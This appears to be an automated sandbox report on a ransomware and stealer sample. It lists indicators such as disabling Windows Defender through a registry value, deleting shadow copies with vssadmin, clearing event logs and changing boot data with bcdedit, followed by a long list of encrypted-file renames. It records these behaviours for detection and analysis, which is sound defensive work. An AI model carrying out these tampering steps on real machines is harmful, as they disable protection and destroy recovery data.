Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-x5evksdgdl
Target cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z
SHA256 d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Tags
evasion ransomware trojan spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d

Threat Level: Known bad

The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan spyware stealer

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Modifies boot configuration data using bcdedit

Deletes shadow copies

Clears Windows event logs

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Modifies registry class

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 19:25

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 19:25

Reported

2022-01-12 19:31

Platform

win10-en-20211208

Max time kernel

17s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__uTJwS_wTca40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__WIlV5lqQLI80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__5nfZNqJnrxo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__ecfTqs68Oqs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mip.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\.eclipseproduct.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__QmcZw_U9X2U0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__HULRZ1hWbBE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__bOPa0tWtqdY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\si.txt.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__nZiA3WryaWo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaprsr.dll.mui.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__1KAXEJavTtc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\el-GR\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__K2u2ZxLpuFE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__XCjn8otelWY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__44ckIen84Go0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__E7KGHdiv8XI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__K8qRUe9G_jU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__TsxnJsFnapI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__UCB4Tz4MjlM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__mErxA-n7C2E0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__0T6IuTGrAco0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__NNZoP-SEy_40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__T1M8cNaPA1w0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__xYHAHcje4e00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__2Dd9gGaVYsI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\SoftBlue.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__TLmM3tyZ8LI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__ht2WozhFxss0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__IV6a7bYfdpY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__lE-1MGBcemc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__laWY-gFBa4Y0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__mHOzeF6DKiA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__RMxPASeseQs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__AnOGBZbYesI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__G_tEifDPAUc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\VERSION.txt.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__iWQ_4O0Rz0k0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__sESq3iQ0WP80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__KF1XyVSMVWU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\ShapeCollector.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__tlJYWyJGizg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__nxX_bphsjiM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__UXE3tfFfqC40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__qPr5YA0TRUE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__VjV6SF2Q9580.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__WTnZPQiTZrA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__TQRluW7RZWw0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__trrwTMcQpfQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__jA9VPE16zZE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__54XbaOYhlDc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__9OLv6tGNfeY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__pYz7nyEf_x40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__xPuXWWN-GUs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__8jDKjk55uKc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__1EsiV9WRbI80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\org-openide-filesystems.jar.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__SwByqDi7dJg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.3LOnfkiINQ9dF2xd2cPe_JmW4f35XSmHX2Ug8wq5o5__dQUdaOrwQcE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
